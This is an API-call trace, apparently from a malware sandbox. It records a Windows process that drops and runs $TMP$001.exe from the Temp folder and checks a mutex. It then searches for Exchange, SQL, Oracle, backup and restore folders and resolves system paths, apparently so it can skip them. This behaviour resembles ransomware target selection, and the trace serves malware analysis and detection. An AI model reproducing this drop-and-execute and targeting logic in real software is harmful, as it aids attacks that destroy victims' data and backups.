[0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.382] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.383] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] RegCloseKey (hKey=0x190) returned 0x0 [0100.383] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.383] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GetEnvironmentVariableA (in: lpName="temp", lpBuffer=0x18fa14, nSize=0x400 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0100.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79f28, cbMultiByte=49, lpWideCharStr=0x18ee10, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned 49 [0100.385] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0100.387] WriteFile (in: hFile=0x190, lpBuffer=0x1e17f08*, nNumberOfBytesToWrite=0xae00, lpNumberOfBytesWritten=0x18fe04, lpOverlapped=0x0 | out: lpBuffer=0x1e17f08*, lpNumberOfBytesWritten=0x18fe04*=0xae00, lpOverlapped=0x0) returned 1 [0100.389] CloseHandle (hObject=0x190) returned 1 [0100.481] WinExec (lpCmdLine="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", uCmdShow=0x1) returned 0x21 [0103.186] GetTickCount () returned 0x114d9ad [0103.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4044d8, lpParameter=0x1ea1ba0, dwCreationFlags=0x0, lpThreadId=0x18fe10 | out: lpThreadId=0x18fe10*=0x9ec) returned 0x18c [0103.188] GetTickCount () returned 0x114d9ad [0103.188] Sleep (dwMilliseconds=0x1) [0103.200] GetTickCount () returned 0x114d9bc [0103.200] Sleep (dwMilliseconds=0x1) [0103.217] GetTickCount () returned 0x114d9cc [0103.217] Sleep (dwMilliseconds=0x1) [0103.232] GetTickCount () returned 0x114d9dc [0103.232] Sleep (dwMilliseconds=0x1) [0103.250] GetTickCount () returned 0x114d9eb [0103.250] Sleep (dwMilliseconds=0x1) [0103.263] CloseHandle (hObject=0x18c) returned 1 [0103.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea1ba8, cbMultiByte=3, lpWideCharStr=0x18ee00, cchWideChar=2047 | out: lpWideCharStr="C:\\") returned 3 [0103.264] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.264] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.264] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.264] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.264] SysReAllocStringLen (in: pbstr=0x18fe04*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x18fe04*="C:\\") returned 1 [0103.264] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.264] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.265] FindFirstFileW (in: lpFileName="C:\\Microsoft\\Exchange Server", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="䱈@㯦V㮺V企@ﭰ\x18㳔V︌\x18\x1b")) returned 0xffffffff [0103.265] GetLastError () returned 0x3 [0103.265] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=21, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0103.265] FindFirstFileW (in: lpFileName="C:\\Microsoft SQL Server", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㮴V企@ﭰ\x18㶬V︌\x181")) returned 0xffffffff [0103.265] GetLastError () returned 0x2 [0103.266] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=9, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0103.266] FindFirstFileW (in: lpFileName="C:\\Firebird", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㳔V企@ﭰ\x18㗤X︌\x18;")) returned 0xffffffff [0103.266] GetLastError () returned 0x2 [0103.266] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=8, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0103.266] FindFirstFileW (in: lpFileName="C:\\MSSQL.1", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㚄X企@ﭰ\x18㞜X︌\x18D")) returned 0xffffffff [0103.267] GetLastError () returned 0x2 [0103.267] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=8, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=37, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.267] FindFirstFileW (in: lpFileName="C:\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㗤X企@ﭰ\x18伤W︌\x18j")) returned 0xffffffff [0103.267] GetLastError () returned 0x2 [0103.267] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.268] FindFirstFileW (in: lpFileName="C:\\Adobe", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@幌W企@ﭰ\x18㝴X︌\x18q")) returned 0xffffffff [0103.268] GetLastError () returned 0x2 [0103.268] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="adobe\\传Wð") returned 6 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.268] FindFirstFileW (in: lpFileName="C:\\Oracle", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㕬X企@ﭰ\x18㗤X︌\x18y")) returned 0xffffffff [0103.269] GetLastError () returned 0x2 [0103.269] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.269] FindFirstFileW (in: lpFileName="C:\\Archive", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㝴X企@ﭰ\x18㚄X︌\x18\x81")) returned 0xffffffff [0103.269] GetLastError () returned 0x2 [0103.269] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.270] FindFirstFileW (in: lpFileName="C:\\Backup", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㗤X企@ﭰ\x18㕬X︌\x18\x88")) returned 0xffffffff [0103.270] GetLastError () returned 0x2 [0103.270] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="backup㚀X ") returned 6 [0103.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.270] FindFirstFileW (in: lpFileName="C:\\Reserv", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㚄X企@ﭰ\x18㝴X︌\x18\x8f")) returned 0xffffffff [0103.270] GetLastError () returned 0x2 [0103.271] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="reserv㕨X ") returned 6 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.271] FindFirstFileW (in: lpFileName="C:\\Restore", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㕬X企@ﭰ\x18㗤X︌\x18\x97")) returned 0xffffffff [0103.271] GetLastError () returned 0x2 [0103.271] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.272] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.272] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.272] GlobalUnlock (hMem=0x450004) returned 0 [0103.272] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.272] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.272] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.272] GlobalUnlock (hMem=0x450004) returned 0 [0103.272] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.272] GlobalUnlock (hMem=0x45000c) returned 0 [0103.272] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.272] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.272] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.272] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0103.273] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.273] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.273] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.273] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9bb8, cbMultiByte=11, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.273] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.273] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.273] GlobalUnlock (hMem=0x45000c) returned 0 [0103.273] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.273] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.273] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.273] GlobalUnlock (hMem=0x45000c) returned 0 [0103.273] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.273] GlobalUnlock (hMem=0x450004) returned 0 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=11, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=10, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=8, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] SHGetMalloc (in: ppMalloc=0x18facc | out: ppMalloc=0x18facc*=0x767666bc) returned 0x0 [0103.276] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18fac8 | out: ppidl=0x18fac8) returned 0x0 [0103.280] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.280] SysReAllocStringLen (in: pbstr=0x18fb50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18fb50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.281] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.281] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.281] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.281] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.281] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.281] GlobalUnlock (hMem=0x450004) returned 0 [0103.281] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.281] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.281] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.281] GlobalUnlock (hMem=0x450004) returned 0 [0103.281] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.281] GlobalUnlock (hMem=0x45000c) returned 0 